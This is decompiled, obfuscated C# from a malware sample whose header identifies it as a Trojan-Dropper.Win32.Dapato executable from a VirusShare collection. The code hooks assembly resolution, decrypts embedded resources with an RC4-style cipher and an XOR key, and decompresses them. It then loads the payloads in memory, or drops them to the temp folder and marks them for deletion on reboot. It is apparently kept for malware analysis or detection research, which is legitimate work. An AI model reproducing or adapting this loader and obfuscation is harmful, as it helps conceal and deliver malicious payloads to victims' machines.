// Decompiled with JetBrains decompiler // Type:  // Assembly: ss20, Version=1.1.1.1, Culture=neutral, PublicKeyToken=null // MVID: 4385E1A7-2FA8-4895-8952-90E8ECDFEF6F // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.awrl-32c3dc21d69dcf58806a205f7919ff769fda4c1659e61dc7d2c60838850ea6d5.exe using System; using System.Collections.Generic; using System.IO; using System.IO.Compression; using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; using System.Text; internal static class \u000E { internal static void \u0002() => AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u000E.\u0002); [MethodImpl(MethodImplOptions.NoInlining)] private static Assembly \u0002(object _param0, ResolveEventArgs _param1) { string str1 = new \u000E.\u0002(_param1.Name).\u0002(false); if (true) goto label_38; label_1: string s1; string base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(s1)); if (true) goto label_39; label_2: string str2 = \u000F.\u0002(-1181139859); if (true) goto label_40; label_3: string str3; string str4 = str3; char[] chArray1 = new char[1]; if (true) goto label_41; label_4: char[] chArray2; chArray2[0] = ','; char[] chArray3 = chArray2; string[] strArray1 = str4.Split(chArray3); if (true) goto label_42; label_5: if (true) goto label_43; label_6: if (true) goto label_44; label_7: if (true) goto label_45; label_8: string str5 = (string) null; string s2 = (string) null; string[] strArray2; string str6; bool flag1; bool flag2; bool flag3; for (int index = 0; index < strArray2.Length; index += 3) { if (strArray2[index].Equals(str6, StringComparison.Ordinal)) { str5 = strArray2[index + 1]; s2 = strArray2[index + 2]; int length = str5.IndexOf('|'); if (length >= 0) { string str7 = str5.Substring(0, length); str5 = str5.Substring(length + 1); flag1 = str7.IndexOf('a') != -1; flag2 = str7.IndexOf('b') != -1; flag3 = str7.IndexOf('c') != -1; break; } break; } } if (str5 == null) return (Assembly) null; Dictionary dictionary = \u000E.\u0003.\u0002; Assembly assembly; lock (dictionary) { if (!dictionary.TryGetValue(str5, out assembly)) { Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str5); if (manifestResourceStream == null) return (Assembly) null; int length1 = (int) manifestResourceStream.Length; byte[] numArray = new byte[length1]; manifestResourceStream.Read(numArray, 0, length1); manifestResourceStream.Dispose(); if (flag1) numArray = \u000E.\u0003(numArray); if (flag2) numArray = \u000E.\u0002(numArray); int length2 = numArray.Length; byte[] bytes = Convert.FromBase64String(s2); string path2 = Encoding.UTF8.GetString(bytes, 0, bytes.Length); if (!flag3) { try { assembly = Assembly.Load(numArray); } catch (FileLoadException ex) { flag3 = true; } catch (BadImageFormatException ex) { flag3 = true; } } if (flag3) { try { string str8 = Path.Combine(Path.GetTempPath(), str5); Directory.CreateDirectory(str8); string str9 = Path.Combine(str8, path2); if (!File.Exists(str9)) { Stream stream = (Stream) File.Create(str9); stream.Write(numArray, 0, length2); stream.Dispose(); try { \u000E.\u0002(str9, (string) null, 4); \u000E.\u0002(str8, (string) null, 4); } catch { } } assembly = Assembly.LoadFrom(str9); } catch { } } dictionary.Add(str5, assembly); } } return assembly; label_45: flag3 = false; goto label_8; label_44: flag2 = false; goto label_7; label_43: flag1 = false; goto label_6; label_42: strArray2 = strArray1; goto label_5; label_41: chArray2 = chArray1; goto label_4; label_40: str3 = str2; goto label_3; label_39: str6 = base64String; goto label_2; label_38: s1 = str1; goto label_1; } private static int \u0002(byte[] _param0, int _param1) { byte[] numArray = _param0; if (true) ; int index = _param1; return (int) numArray[index] | (int) _param0[_param1 + 1] << 24 | (int) _param0[_param1 + 2] << 8 | (int) _param0[_param1 + 3] << 16; } private static byte[] \u0002(byte[] _param0) { int num1 = \u000E.\u0002(_param0, 0); if (true) goto label_6; label_1: int num2; if (num2 != -1686991929) throw new Exception(); int num3 = \u000E.\u0002(_param0, 4); if (true) goto label_7; label_4: MemoryStream memoryStream = new MemoryStream(_param0, false); if (true) goto label_8; label_5: Stream stream1; stream1.Position = 8L; Stream stream2 = (Stream) new DeflateStream(stream1, CompressionMode.Decompress); int count; _param0 = new byte[count]; stream2.Read(_param0, 0, count); return _param0; label_8: stream1 = (Stream) memoryStream; goto label_5; label_7: count = num3; goto label_4; label_6: num2 = num1; goto label_1; } [MethodImpl(MethodImplOptions.NoInlining)] private static byte[] \u0003(byte[] _param0) { string str = \u000F.\u0002(-1181139719); if (true) goto label_11; label_1: string s; byte[] numArray1 = Convert.FromBase64String(s); if (true) goto label_12; label_2: byte[] numArray2; \u0003\u2000.\u0002(numArray2); \u000E.\u0005 obj1 = new \u000E.\u0005(numArray2); if (true) goto label_13; label_3: int length = _param0.Length; byte num1 = 0; byte num2 = 121; byte[] numArray3 = new byte[8] { (byte) 148, (byte) 68, (byte) 208, (byte) 52, (byte) 241, (byte) 93, (byte) 195, (byte) 220 }; \u000E.\u0005 obj2; for (int index = 0; index != length; ++index) { if (num1 == (byte) 0) num2 = obj2.\u0002(); ++num1; if (num1 == (byte) 32) num1 = (byte) 0; _param0[index] ^= (byte) ((uint) num2 ^ (uint) numArray3[index >> 2 & 3] ^ (uint) numArray3[(int) num1 & 3]); } return _param0; label_13: obj2 = obj1; goto label_3; label_12: numArray2 = numArray1; goto label_2; label_11: s = str; goto label_1; } [DllImport("kernel32", EntryPoint = "MoveFileEx")] private static extern bool \u0002(string _param0, string _param1, int _param2); private struct \u0002 { public Version \u0002; public string \u0003; public string \u0005; public string \u0008; public \u0002(string _param1) { Version version = new Version(); if (true) goto label_15; label_1: string empty = string.Empty; if (true) goto label_16; label_2: if (true) goto label_17; label_3: this.\u0008 = (string) null; string str1 = _param1; char[] chArray = new char[1]{ ',' }; foreach (string str2 in str1.Split(chArray)) { string str3 = str2.Trim(); if (str3.StartsWith(\u000F.\u0002(-1181139052), StringComparison.Ordinal)) this.\u0002 = new Version(str3.Substring(\u000F.\u0002(-1181139052).Length)); else if (str3.StartsWith(\u000F.\u0002(-1181138971), StringComparison.Ordinal)) { this.\u0005 = str3.Substring(\u000F.\u0002(-1181138971).Length); if (this.\u0005 == \u000F.\u0002(-1181138954)) this.\u0005 = (string) null; } else if (str3.StartsWith(\u000F.\u0002(-1181139000), StringComparison.Ordinal)) { this.\u0008 = str3.Substring(\u000F.\u0002(-1181139000).Length); if (this.\u0008 == \u000F.\u0002(-1181138990)) this.\u0008 = (string) null; } else this.\u0003 = str3; } return; label_17: this.\u0005 = (string) null; goto label_3; label_16: this.\u0003 = empty; goto label_2; label_15: this.\u0002 = version; goto label_1; } public string \u0002(bool _param1) { StringBuilder stringBuilder1 = new StringBuilder(); if (true) goto label_4; label_1: StringBuilder stringBuilder2; stringBuilder2.Append(this.\u0003); if (_param1) stringBuilder2.Append(\u000F.\u0002(-1181139929)).Append((object) this.\u0002); stringBuilder2.Append(\u000F.\u0002(-1181139914)).Append(this.\u0005 ?? \u000F.\u0002(-1181138954)).Append(\u000F.\u0002(-1181139963)).Append(this.\u0008 ?? \u000F.\u0002(-1181138990)); return stringBuilder2.ToString(); label_4: stringBuilder2 = stringBuilder1; goto label_1; } } private static class \u0003 { internal static readonly Dictionary \u0002; static \u0003() { Dictionary dictionary = new Dictionary((IEqualityComparer) StringComparer.Ordinal); if (false) return; \u000E.\u0003.\u0002 = dictionary; } } private sealed class \u0005 { private byte[] \u0002; private int \u0003; private int \u0005; public \u0005(byte[] _param1) { byte[] numArray = new byte[256]; if (true) goto label_9; label_1: // ISSUE: explicit constructor call base.\u002Ector(); int length = _param1.Length; if (true) goto label_10; label_2: if (true) goto label_11; label_5: for (; this.\u0003 < 256; ++this.\u0003) this.\u0002[this.\u0003] = (byte) this.\u0003; int num; for (this.\u0003 = this.\u0005 = 0; this.\u0003 < 256; ++this.\u0003) { this.\u0005 = this.\u0005 + (int) _param1[this.\u0003 % num] + (int) this.\u0002[this.\u0003] & (int) byte.MaxValue; this.\u0002(this.\u0003, this.\u0005); } return; label_11: this.\u0003 = 0; goto label_5; label_10: num = length; goto label_2; label_9: this.\u0002 = numArray; goto label_1; } private void \u0002(int _param1, int _param2) { int num1 = (int) this.\u0002[_param1]; if (true) goto label_2; label_1: this.\u0002[_param1] = this.\u0002[_param2]; byte num2; this.\u0002[_param2] = num2; return; label_2: num2 = (byte) num1; goto label_1; } public byte \u0002() { int num1 = this.\u0003 + 1 & (int) byte.MaxValue; if (true) goto label_3; label_1: int num2 = this.\u0005 + (int) this.\u0002[this.\u0003] & (int) byte.MaxValue; if (true) goto label_4; label_2: this.\u0002(this.\u0003, this.\u0005); return this.\u0002[(int) (byte) ((uint) this.\u0002[this.\u0003] + (uint) this.\u0002[this.\u0005])]; label_4: this.\u0005 = num2; goto label_2; label_3: this.\u0003 = num1; goto label_1; } } }